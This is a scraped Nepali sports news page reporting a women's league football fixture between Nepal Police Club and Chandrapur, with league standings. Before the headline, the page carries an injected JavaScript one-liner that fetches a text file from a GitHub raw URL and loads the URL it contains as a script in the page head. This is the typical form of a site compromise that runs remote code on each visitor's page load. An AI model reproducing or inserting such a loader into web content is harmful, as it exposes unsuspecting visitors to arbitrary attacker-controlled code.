;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); राष्ट्रिय महिला लिगमा नेपाल पुलिस क्लब र चन्द्रपुर खेल्ने – जुनेली न्युज
बिहिबार, बैशाख ५, २०८२
  • होमपेज
  • राष्ट्रिय महिला लिगमा नेपाल पुलिस क्लब र चन्द्रपुर खेल्ने
खेलकुद

राष्ट्रिय महिला लिगमा नेपाल पुलिस क्लब र चन्द्रपुर खेल्ने

माघ ३०,

काठमाडौं । राष्ट्रिय महिला लिग फुटबल प्रतियोगितामा आज नेपाल पुलिस क्लब र चन्द्रपुर नगरपालिका रौतहटबीच खेल हुँदैछ ।

खेल दिउँसो २ बजे एन्फा कम्प्लेक्स सातदोबाटोमा हुनेछ । पुलिस ८ खेलमा ११ अंक जोडेर अङ्क तालिकाको चौंथो स्थानमा छ भने चन्द्रपुर ६ अङ्क जोडेको छैठौं स्थानमा  छ ।

खेलमा अहिलेसम्म अपराजित एपीएफ भने २४ अङ्क जोडेर शीर्ष स्थानमा छ ।

फेसबुक प्रतिक्रियाहरु